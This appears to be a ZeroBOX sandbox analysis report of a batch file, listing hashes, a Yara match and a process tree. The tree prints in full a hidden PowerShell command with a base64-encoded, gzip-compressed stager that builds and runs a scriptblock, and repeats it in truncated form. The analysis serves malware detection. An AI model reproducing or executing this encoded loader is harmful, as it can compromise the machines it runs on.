Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 30, 2024, 11:26 a.m.	Sept. 30, 2024, 11:55 a.m.

Size	7.8KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`d73df76a7d5d41df1d142a0c19c79b55`
SHA256	`5839d7d67a82e7c93deafb5807391b3a0e12ab31b154cd3f8a7ff3318c14bd0b`
CRC32	`E659B64F`
ssdeep	`192:+n2jh1hqT25k3YuH7khy35gwIpzwaks8ip0B2dHhW:+n2jh1hsV3YA77JgwIh9kVP4dHhW`
Yara	Antivirus - Contains references to security software

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "PZFlafErlokfv" C:\Users\test22\AppData\Local\Temp\Trial2.bat
2576
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Trial2.bat
  2652
  - cmd.exe C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBIAHsAMQB9ADQAbQBZAEMAQQA3ADEAWABlAFkAKwBqAHgAaABMAC8AUAAxAEsAKwBBADQAbwBzAEcAVwBzADkATgB2AGoAWQBuAFYAbABwAHAAUQBmAFkAKwBJAGoAQgBCADkAagA0AGkAQgBXADEAbwBRADEAdABHAHYAQgBDAE0ANQBqAEoAeQAzAGQALwBoAFkAOAA1AHQATABQAFIASgBsAEoAZQBTADkAWQAwADMAVgBYAFYAVgBiADgANgBaADUAKwBHAE4AaQBOAFIAeQBHAFgAcABwACsARwBTACsAKwBQAG4AbgA3AGoAcgBtAHEAQQBZAEIAUgB4AGYAeQBvADEAewAxAH0AdgA4AHEAVgA4AEwAMwBjAEUAQwBvAHYAMQA2AFYAMAArAHYAdgBoAEUALwBlAEYANAB6AGYAUwA4AGQAaQBKAEEAawBUAEMANwBlAGYAUABTAGgAcgBIAE8ARwBTAFgANwAxAG8AUABNAHkAbABKAGMATABDAGoAQgBDAGQAOABoAGYAcwB2AFoAMwBrADQAeABuACcAJwArACcAJwBmAGoAMwBRAEgAYgBqAFAAdQBEAEsALwAxAGUANgA5AEYAbwBoACsAaQBWAEwARgBlAFEANwBXAEgAdQBUAGcAcQBkADQAbQA0AFUAewAxAH0AYQBqAFEAcgBtAFkAYwBLAFcARgA4ACsAYgBmAGYAeQBwAFgATgBuAGIAaQB0AGQAYgArAG0AaQBDAFoAOAB7ADEAfQBjAGcAVABoAG8ATwBhAFEAewAxAH0AbQA1AHcAdgAxAFoASwBSADQAMAA4AHkAUABtAHkAeABxAHgANAB5AGkASgA5AHEAeABtAGsAYgBEAFoAcQBNADMARABCAE8AJwAnACsAJwAnAHsAMQB9AHgARAB0AEkAZQAnACcAKwAnACcAcwBZAGEAWgBGAHoAbABKAEcAYQB4ADUAcwBTAGYARwBMAEkAMwBEAHEAMQBtAEYAbgBBAHMAVgBYADQAYgB0AEoASQA1AHMAeQBYAEYAaQBuAEMAVABsAEsAcgBjAHAAWAB0AGgAcwB0AC8ALwBoAE4AOQBmAG4AWgB7ADEAfQBuAEkAUwBJAEIAcgBnADUARABoAE8ARABvAGEATwBIADQAawBOAGsANQBxAGYAUgBRADYARgBNAC8AdwBmAGcAdABjAEIAbwB0AEoANgBHADQAcgBGAFMAQgA3AGoASAB6AE0AbAA4AEsAVQAwAGkAcgAzAGQAOABUAHcATwBzADUAdQA0AFAAMABvAEUALwArAGEAQwBhAGcAbQBMAEsANQBVAHcAYQAvAHYARwBhAHAARgBUAGsAcgB4AGgAYgBYADgAagBxACcAJwArACcAJwBiAG4AWQBLAGoAQQBlAGcANABJAHcAUABEAFAAQQBzAGIAOQBMAFkANgBDAHsAMQB9AFQAdABCADkASABKAHcAVwA1AHYAegBEAFEAYQBkACsAVQBtAFUAawBEAFAAcgBGADAANgBvAGMAaABvADgAagBsAGcAVQA1AC8AQgBaAE0AdQBNAFUAVgA3AGIAUABpAEgATwBsAFgASABFAEMAcQAvAHEAagA0AHMAUQBiAEwAMwBDADYANQBwAEgAQwAwAFcAWQBSAEUAVwBmADcASQB1AEIATgBEAEoAUwArAFIAZwBYAEoAOQArAE8ANQBnAC8AYwBrAHgASgAwADgAUgBBAEcAeABiAHkASABMAHYAKwBjAFYAdgBLAGYANABEAEUAagB0AFIAcQBhAEQAZgBuAHoANQBlAG8ARwBkAEQAcQBiAFkAUgBhAHkAQQB1AFEAaQBPAGIAOQBpADYAQQBXAEgAUAB2AEgASgBLAHEASQBOAGoAeQBRAGIAUABKAHEAQQBWAE8ATAAzAHkAVgBwAG0ATAA1AC8AagB5AEkATgBSAHcAQQBPAGgAZAB2AGkARgBhAFMAMwB0AEkARgBIAHkAagB2AGkAWgBIAGYAbgB1ADkAKwBBAGEAaQBzAGsASgBSAGsAbABTADUAUwBRAHEAWgBhAGwAYwA1AEEAJwAnACsAJwAnAHkATwBLAG4AUwBvAG4AaABRAG0ANQAnACcAKwAnACcAWABrAGsAcABpADgANwBiADgAbwB1ADYAVwBrAG8AWgBzAFYASABDAGIAdQBLAHsAMQB9AGwAVABkAGcAWABoADkAVgBvAGoAQgBoAGMAVwBxAEQAVgB3AEUAQQAwAHoAaABpAG0AeQBCAGEANABGAEgAbAArAHMAVABCAGMAbQA0AFEAOQAvAFoANAArAFYAMAAwAEYARQBRAHAAWgBBADkASQBlAGcAUgB2AHcARQBtAEIAZwBzAEcASwBXAEkAbABCAHoAMAB0AGMAVgBHAG8ARwBaAG8AUABnAFMASABFAEEAUgBPAGYAQwBvAFYATABrAFEAcABtADQASgBzAGsANQB1AHAAQwBMAG4AZgBLADcAZQB0ADQAUwA0AFIATAAxAEIAUwB3ADMAUABGADUAcABDAGIANAB7ADEAfQBhAE0AUwBxADMASQBMAEUARABJAHAAUQBBAFgARQBSAFcALwA5AE0AaQBXAC8AcgBEAHsAMQB9AGkAagB4AFAAagBxAEcAdgA2AFcAWABoAHMANQBaADAAVQBHAGwAQQA1AEoAMQAwACsASwBJAEwAMQBpAGQARQBZAGsAWgBvAEMARwBHAGsAZQBCAGoAQgBMADgAcwBYAFcAcABOAFAAdwB2ADkAVABHAFoAUwBMAEIAVwBnADUAQgBxAHoAdAAnACcAKwAnACcAQQBuADQAaQBDAEQAbgB3ACcAJwArACcAJwBhAC8ATwBXAGsATwBJAG0AMQAvAFAAJwAnACsAJwAnAHsAMQB9AEYAQwBGAEcAaQB7ADEAfQBrAGsAeAA2ADYAcgAxAEUATQBqAGUAegA3ADMAWABKAGQAbwBZAE8AZgBqAEMAJwAnACsAJwAnAEEAYgByAHAAbwBNAFcAVQBpADkAYQBkACcAJwArACcAJwBFAGsARgB1AGUAJwAnACsAJwAnAEwAUQB0AG0AcwBSAGQAZABWADMASgAwAE8ASAAnACcAKwAnACcATgBYAG4AawB7ADEAfQBGAFMAYQBkAGYATgAxAGEASgBRAEwASwArAHAAZABrAGQAKwBTAGwAcgBKAEIAQwBxAHIAVgBaAC8ASwBVAGoATgBaAG0AdgBjAEYASAB6AEEAYgB3AFYAOABQAHYAQQBGAEoARAB1AE4AWQBBADgAbABkAFQAeQBTAEIANABrAHMARABHAGgAMwBxAE0AeAB7ADEAfQBWAGsATgBkAFcANwBSAGYAYgA2AG4AZQAzAG8AbwBTADQAKwBPAHEAVQA2AC8AWABIAHgAegBVAGEAMQBOAEgAawBpAE8AbgBRAFYATwAwAG0ARQBWAG0AMwB3ADcAawBlAG4AewAxAH0AaABPAGMAeQBjAGkANwBvADUALwAwAEMANgBoAFoAewAxAH0AbQA5AGYAQQAnACcAKwAnACcAUgBXAGEAZABrACcAJwArACcAJwBaAGQAeQBMAG8ANABQAGsALwBxAG8ANgB4ADEAMAB3AGUAMwBTAGEAbQBtAHYAUwBxAGEAdQBaAFUAcQBwADEARQBuAGMAQgBjAHYAVABEADkATgBPAGcANwB6AFoAMAB4AFgAZQBuAFMAegBuAGIAOQBSAGIATAB0AFQAVQBjAG8AZQBYADAAVQBUAGUAMQA1AHUAaQBnAE4AUQBhAEsATgB6AEwAVQBtAFcANABxAG0AYgB2AHIAMABYAGgAdAB5AFAAewAxAH0AMQBwAGMAZQA3AEgASABnAGEAWAByADUAcgBpAEgAJwAnACsAJwAnAFQAMAA1AEwAZgBnAHIAVgBUAHYAewAxAH0ATwBKAFkAYQBiAFUAMABRAHoAWgBYADEAdABxAHoAQQAvADkARgBUAG4AZgBoAHIALwBQADcAdABwADYAMwBzAHQARwBoAG0AKwBsAFAAQQAzAGoAZgBsADEARABuAGEARwBHADAAcgA0AHMATAAzAFUAUQB1AHsAMQB9AE4ARQBnAFMAdAArAFYAcABJADkANgBWAHAAagB6AHUARgB1AHUAbQA0ADUAMQBhAHEANAA3ADcAbQBrAHUATABqAFMAYgBxAGkAZQA3AE0AVgB3AHMAbgB5AGkAWgBMAHgAZQBUAHEAYQArAHYANQA0AEQASAByAHQASABXAFUATwBBAGMAVgB2ADQAcwBtADgAOQBQAGEAQwBhAG8AMQBzAGgAcQA1ADkAWgBpADMAWABZAGEAMwBkAFAAcwBTAGMAKwAxAHUAZABxADEARwA4ADUAcQAzAGYASABFAE8AWgBXAFAAUwAwAEYAdABhAEQAMAB7ADEAfQBSAFUASAA3AHUARwB0AEsAdQBkADAAWgBaAHMAaQBuAFEAMQAwADkAbwBvAFUAZwB0AGsAegBMAGwAKwBZADkAYgAwAG4AVwA5AFYANwA5AHcAUgBxAGUAcQBCADUASgAwAGoARAB5AFYATgBCAFQAZABNAHgARgBjAEkAZwBYAFIAdQBzAFQAMwBGAG4ASQBQAGUANwBQAGYAaABEAFgAMABXAGkANgBXAG0ASAB3AEQAYwBTAEsAcQBQAGIASQBvAEEAdQBtAG8ASwA2AFoANgBiAGgAVABGACsAYwBQAFkAZwB0ADcAbwA4AEkANAA1AE0AdQBSAEoATQBPAG0AQgB3AGEARAA5ACsAJwAnACsAJwAnAFkATgBiADMAVgBVAEoAeABUAGsAZwBaAHoAeABzAEMAMAA2AGsAYQBUAEEAdgBhAHAAYgBTAFAANwBWAEkAbgBoAFUARgAxAGQATAB5AGQARQArAGoATwBTAHMAMwB5AG4AawB0AHgAZQBIAHoAdgBLACcAJwArACcAJwBEAFYAeQAvAFcAdQBPAE8AbgBtAHUAawBEADMAbAAxAFIAVgAxAG8AbgB6AFYAeABKAGEAVgAwAFIASQA3AHIAKwBLAHEAbQBUAHUAagBqADkAOAB1AFUAWAB5AEsAYgBOAG4ASQBTAHMAewAxAH0AZABpAFcANABxAHoAbwBOAHoALwAvAFYATgBvADMAJwAnACsAJwAnAEQANgA4AFQANgBuAHYAOQBWAEUATgB4ADQAaQBFAEsAaQBRAFoAOQA4AGwAYgB2ADEAQwAnACcAKwAnACcAaABXAHIANAAxAHYARQBwAEcAQwBnACsAYwB2AGcANQBTAFAANAB4AEIAVABHAEQAeABnAE4ATABtAFYAQwBvAG4AUwB5AEMANQA2AEwALwBSAEkANgBQAHEAWABYAGwAeQBNAEIAdgBQAEIAVwBhAGYAMwBkAGgAWAB1AG0AYgBEAHkAMABwAEIAdgBSADUAOAAvAHIAMABGAEoASwBEACcAJwArACcAJwAzAG4AcwBsAEEAYgA0AGQAQgBsAFgAbABVADQATgBRAFUAQgBXAHEAbAB3AEUAbAByAG4ARwB2AFAAagB0AGkAbgBSAE0AZQBjAHYAMABxAHAARgBOAHoANgBqADgAeQB5AGYAbgB1AFcARABTAEwATABuAGUAUAA3AC8AZwBCAGcATQBYAGcAdwA2AHcAUAAnACcAKwAnACcAYwB3ACsAeAA1ADgAOABMAFEAUAA5AFIAcgA2AHgANgBXAEkARgBpAEQASwBVAFUAUgBmAFEAMwBpADEANwBEAGsAZQAzAGkAQQBJADAASQBsAGcALwBhAGEAWQB1AFMAQgBTAFEATQBBAGQALwBzAHEAVgBXAEQARwBPAHYAQgA1AHYAUwB1ADUANAA5AFMALwBIAHoAcgBVAFoAZQBQAEQASAArAGUAdgBZAGUAVABuADcAaQA5AHMAZgBpAGkAZQBoAGUAawBIAG4AbQArAE8AMwBCADYAKwBhADYATAArAEoAZwBJAFUASQBBADEASQBEAGUAaAByAEYAbAB6AEgAcgBQAFMAQwB1ACsAZgBMAEsAdwArAEEAYwB5AEkAWAA5AGQAUgBYAC8AZgBZAHgAVABkAHEAZgBEAEwASAB2AHUAcQB2ACcAJwArACcAJwA4AEQAVwBWAFIAdABBAHYAcwBNAEEAQQBBAHsAMAB9ACcAJwApAC0AZgAnACcAPQAnACcALAAnACcAMgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==
    2740
    - powershell.exe powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBIAHsAMQB9ADQAbQBZAEMAQQA3ADEAWABlAFkAKwBqAHgAaABMAC8AUAAxAEsAKwBBADQAbwBzAEcAVwBzADkATgB2AGoAWQBuAFYAbABwAHAAUQBmAFkAKwBJAGoAQgBCADkAagA0AGkAQgBXADEAbwBRADEAdABHAHYAQgBDAE0ANQBqAEoAeQAzAGQALwBoAFkAOAA1AHQATABQAFIASgBsAEoAZQBTADkAWQAwADMAVgBYAFYAVgBiADgANgBaADUAKwBHAE4AaQBOAFIAeQBHAFgAcABwACsARwBTACsAKwBQAG4AbgA3AGoAcgBtAHEAQQBZAEIAUgB4AGYAeQBvADEAewAxAH0AdgA4AHEAVgA4AEwAMwBjAEUAQwBvAHYAMQA2AFYAMAArAHYAdgBoAEUALwBlAEYANAB6AGYAUwA4AGQAaQBKAEEAawBUAEMANwBlAGYAUABTAGgAcgBIAE8ARwBTAFgANwAxAG8AUABNAHkAbABKAGMATABDAGoAQgBDAGQAOABoAGYAcwB2AFoAMwBrADQAeABuACcAJwArACcAJwBmAGoAMwBRAEgAYgBqAFAAdQBEAEsALwAxAGUANgA5AEYAbwBoACsAaQBWAEwARgBlAFEANwBXAEgAdQBUAGcAcQBkADQAbQA0AFUAewAxAH0AYQBqAFEAcgBtAFkAYwBLAFcARgA4ACsAYgBmAGYAeQBwAFgATgBuAGIAaQB0AGQAYgArAG0AaQBDAFoAOAB7ADEAfQBjAGcAVABoAG8ATwBhAFEAewAxAH0AbQA1AHcAdgAxAFoASwBSADQAMAA4AHkAUABtAHkAeABxAHgANAB5AGkASgA5AHEAeABtAGsAYgBEAFoAcQBNADMARABCAE8AJwAnACsAJwAnAHsAMQB9AHgARAB0AEkAZQAnACcAKwAnACcAcwBZAGEAWgBGAHoAbABKAEcAYQB4ADUAcwBTAGYARwBMAEkAMwBEAHEAMQBtAEYAbgBBAHMAVgBYADQAYgB0AEoASQA1AHMAeQBYAEYAaQBuAEMAVABsAEsAcgBjAHAAWAB0AGgAcwB0AC8ALwBoAE4AOQBmAG4AWgB7ADEAfQBuAEkAUwBJAEIAcgBnADUARABoAE8ARABvAGEATwBIADQAawBOAGsANQBxAGYAUgBRADYARgBNAC8AdwBmAGcAdABjAEIAbwB0AEoANgBHADQAcgBGAFMAQgA3AGoASAB6AE0AbAA4AEsAVQAwAGkAcgAzAGQAOABUAHcATwBzADUAdQA0AFAAMABvAEUALwArAGEAQwBhAGcAbQBMAEsANQBVAHcAYQAvAHYARwBhAHAARgBUAGsAcgB4AGgAYgBYADgAagBxACcAJwArACcAJwBiAG4AWQBLAGoAQQBlAGcANABJAHcAUABEAFAAQQBzAGIAOQBMAFkANgBDAHsAMQB9AFQAdABCADkASABKAHcAVwA1AHYAegBEAFEAYQBkACsAVQBtAFUAawBEAFAAcgBGADAANgBvAGMAaABvADgAagBsAGcAVQA1AC8AQgBaAE0AdQBNAFUAVgA3AGIAUABpAEgATwBsAFgASABFAEMAcQAvAHEAagA0AHMAUQBiAEwAMwBDADYANQBwAEgAQwAwAFcAWQBSAEUAVwBmADcASQB1AEIATgBEAEoAUwArAFIAZwBYAEoAOQArAE8ANQBnAC8AYwBrAHgASgAwADgAUgBBAEcAeABiAHkASABMAHYAKwBjAFYAdgBLAGYANABEAEUAagB0AFIAcQBhAEQAZgBuAHoANQBlAG8ARwBkAEQAcQBiAFkAUgBhAHkAQQB1AFEAaQBPAGIAOQBpADYAQQBXAEgAUAB2AEgASgBLAHEASQBOAGoAeQBRAGIAUABKAHEAQQBWAE8ATAAzAHkAVgBwAG0ATAA1AC8AagB5AEkATgBSAHcAQQBPAGgAZAB2AGkARgBhAFMAMwB0AEkARgBIAHkAagB2AGkAWgBIAGYAbgB1ADkAKwBBAGEAaQBzAGsASgBSAGsAbABTADUAUwBRAHEAWgBhAGwAYwA1AEEAJwAnACsAJwAnAHkATwBLAG4AUwBvAG4AaABRAG0ANQAnACcAKwAnACcAWABrAGsAcABpADgANwBiADgAbwB1ADYAVwBrAG8AWgBzAFYASABDAGIAdQBLAHsAMQB9AGwAVABkAGcAWABoADkAVgBvAGoAQgBoAGMAVwBxAEQAVgB3AEUAQQAwAHoAaABpAG0AeQBCAGEANABGAEgAbAArAHMAVABCAGMAbQA0AFEAOQAvAFoANAArAFYAMAAwAEYARQBRAHAAWgBBADkASQBlAGcAUgB2AHcARQBtAEIAZwBzAEcASwBXAEkAbABCAHoAMAB0AGMAVgBHAG8ARwBaAG8AUABnAFMASABFAEEAUgBPAGYAQwBvAFYATABrAFEAcABtADQASgBzAGsANQB1AHAAQwBMAG4AZgBLADcAZQB0ADQAUwA0AFIATAAxAEIAUwB3ADMAUABGADUAcABDAGIANAB7ADEAfQBhAE0AUwBxADMASQBMAEUARABJAHAAUQBBAFgARQBSAFcALwA5AE0AaQBXAC8AcgBEAHsAMQB9AGkAagB4AFAAagBxAEcAdgA2AFcAWABoAHMANQBaADAAVQBHAGwAQQA1AEoAMQAwACsASwBJAEwAMQBpAGQARQBZAGsAWgBvAEMARwBHAGsAZQBCAGoAQgBMADgAcwBYAFcAcABOAFAAdwB2ADkAVABHAFoAUwBMAEIAVwBnADUAQgBxAHoAdAAnACcAKwAnACcAQQBuADQAaQBDAEQAbgB3ACcAJwArACcAJwBhAC8ATwBXAGsATwBJAG0AMQAvAFAAJwAnACsAJwAnAHsAMQB9AEYAQwBGAEcAaQB7ADEAfQBrAGsAeAA2ADYAcgAxAEUATQBqAGUAegA3ADMAWABKAGQAbwBZAE8AZgBqAEMAJwAnACsAJwAnAEEAYgByAHAAbwBNAFcAVQBpADkAYQBkACcAJwArACcAJwBFAGsARgB1AGUAJwAnACsAJwAnAEwAUQB0AG0AcwBSAGQAZABWADMASgAwAE8ASAAnACcAKwAnACcATgBYAG4AawB7ADEAfQBGAFMAYQBkAGYATgAxAGEASgBRAEwASwArAHAAZABrAGQAKwBTAGwAcgBKAEIAQwBxAHIAVgBaAC8ASwBVAGoATgBaAG0AdgBjAEYASAB6AEEAYgB3AFYAOABQAHYAQQBGAEoARAB1AE4AWQBBADgAbABkAFQAeQBTAEIANABrAHMARABHAGgAMwBxAE0AeAB7ADEAfQBWAGsATgBkAFcANwBSAGYAYgA2AG4AZQAzAG8AbwBTADQAKwBPAHEAVQA2AC8AWABIAHgAegBVAGEAMQBOAEgAawBpAE8AbgBRAFYATwAwAG0ARQBWAG0AMwB3ADcAawBlAG4AewAxAH0AaABPAGMAeQBjAGkANwBvADUALwAwAEMANgBoAFoAewAxAH0AbQA5AGYAQQAnACcAKwAnACcAUgBXAGEAZABrACcAJwArACcAJwBaAGQAeQBMAG8ANABQAGsALwBxAG8ANgB4ADEAMAB3AGUAMwBTAGEAbQBtAHYAUwBxAGEAdQBaAFUAcQBwADEARQBuAGMAQgBjAHYAVABEADkATgBPAGcANwB6AFoAMAB4AFgAZQBuAFMAegBuAGIAOQBSAGIATAB0AFQAVQBjAG8AZQBYADAAVQBUAGUAMQA1AHUAaQBnAE4AUQBhAEsATgB6AEwAVQBtAFcANABxAG0AYgB2AHIAMABYAGgAdAB5AFAAewAxAH0AMQBwAGMAZQA3AEgASABnAGEAWAByADUAcgBpAEgAJwAnACsAJwAnAFQAMAA1AEwAZgBnAHIAVgBUAHYAewAxAH0ATwBKAFkAYQBiAFUAMABRAHoAWgBYADEAdABxAHoAQQAvADkARgBUAG4AZgBoAHIALwBQADcAdABwADYAMwBzAHQARwBoAG0AKwBsAFAAQQAzAGoAZgBsADEARABuAGEARwBHADAAcgA0AHMATAAzAFUAUQB1AHsAMQB9AE4ARQBnAFMAdAArAFYAcABJADkANgBWAHAAagB6AHUARgB1AHUAbQA0ADUAMQBhAHEANAA3ADcAbQBrAHUATABqAFMAYgBxAGkAZQA3AE0AVgB3AHMAbgB5AGkAWgBMAHgAZQBUAHEAYQArAHYANQA0AEQASAByAHQASABXAFUATwBBAGMAVgB2ADQAcwBtADgAOQBQAGEAQwBhAG8AMQBzAGgAcQA1ADkAWgBpADMAWABZAGEAMwBkAFAAcwBTAGMAKwAxAHUAZABxADEARwA4ADUAcQAzAGYASABFAE8AWgBXAFAAUwAwAEYAdABhAEQAMAB7ADEAfQBSAFUASAA3AHUARwB0AEsAdQBkADAAWgBaAHMAaQBuAFEAMQAwADkAbwBvAFUAZwB0AGsAegBMAGwAKwBZADkAYgAwAG4AVwA5AFYANwA5AHcAUgBxAGUAcQBCADUASgAwAGoARAB5AFYATgBCAFQAZABNAHgARgBjAEkAZwBYAFIAdQBzAFQAMwBGAG4ASQBQAGUANwBQAGYAaABEAFgAMABXAGkANgBXAG0ASAB3AEQAYwBTAEsAcQBQAGIASQBvAEEAdQBtAG8ASwA2AFoANgBiAGgAVABGACsAYwBQAFkAZwB0ADcAbwA4AEkANAA1AE0AdQBSAEoATQBPAG0AQgB3AGEARAA5ACsAJwAnACsAJwAnAFkATgBiADMAVgBVAEoAeABUAGsAZwBaAHoAeABzAEMAMAA2AGsAYQBUAEEAdgBhAHAAYgBTAFAANwBWAEkAbgBoAFUARgAxAGQATAB5AGQARQArAGoATwBTAHMAMwB5AG4AawB0AHgAZQBIAHoAdgBLACcAJwArACcAJwBEAFYAeQAvAFcAdQBPAE8AbgBtAHUAawBEADMAbAAxAFIAVgAxAG8AbgB6AFYAeABKAGEAVgAwAFIASQA3AHIAKwBLAHEAbQBUAHUAagBqADkAOAB1AFUAWAB5AEsAYgBOAG4ASQBTAHMAewAxAH0AZABpAFcANABxAHoAbwBOAHoALwAvAFYATgBvADMAJwAnACsAJwAnAEQANgA4AFQANgBuAHYAOQBWAEUATgB4ADQAaQBFAEsAaQBRAFoAOQA4AGwAYgB2ADEAQwAnACcAKwAnACcAaABXAHIANAAxAHYARQBwAEcAQwBnACsAYwB2AGcANQBTAFAANAB4AEIAVABHAEQAeABnAE4ATABtAFYAQwBvAG4AUwB5AEMANQA2AEwALwBSAEkANgBQAHEAWABYAGwAeQBNAEIAdgBQAEIAVwBhAGYAMwBkAGgAWAB1AG0AYgBEAHkAMABwAEIAdgBSADUAOAAvAHIAMABGAEoASwBEACcAJwArACcAJwAzAG4AcwBsAEEAYgA0AGQAQgBsAFgAbABVADQATgBRAFUAQgBXAHEAbAB3AEUAbAByAG4ARwB2AFAAagB0AGkAbgBSAE0AZQBjAHYAMABxAHAARgBOAHoANgBqADgAeQB5AGYAbgB1AFcARABTAEwATABuAGUAUAA3AC8AZwBCAGcATQBYAGcAdwA2AHcAUAAnACcAKwAnACcAYwB3ACsAeAA1ADgAOABMAFEAUAA5AFIAcgA2AHgANgBXAEkARgBpAEQASwBVAFUAUgBmAFEAMwBpADEANwBEAGsAZQAzAGkAQQBJADAASQBsAGcALwBhAGEAWQB1AFMAQgBTAFEATQBBAGQALwBzAHEAVgBXAEQARwBPAHYAQgA1AHYAUwB1ADUANAA5AFMALwBIAHoAcgBVAFoAZQBQAEQASAArAGUAdgBZAGUAVABuADcAaQA5AHMAZgBpAGkAZQBoAGUAawBIAG4AbQArAE8AMwBCADYAKwBhADYATAArAEoAZwBJAFUASQBBADEASQBEAGUAaAByAEYAbAB6AEgAcgBQAFMAQwB1ACsAZgBMAEsAdwArAEEAYwB5AEkAWAA5AGQAUgBYAC8AZgBZAHgAVABkAHEAZgBEAEwASAB2AHUAcQB2ACcAJwArACcAJwA4AEQAVwBWAFIAdABBAHYAcwBNAEEAQQBBAHsAMAB9ACcAJwApAC0AZgAnACcAPQAnACcALAAnACcAMgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwB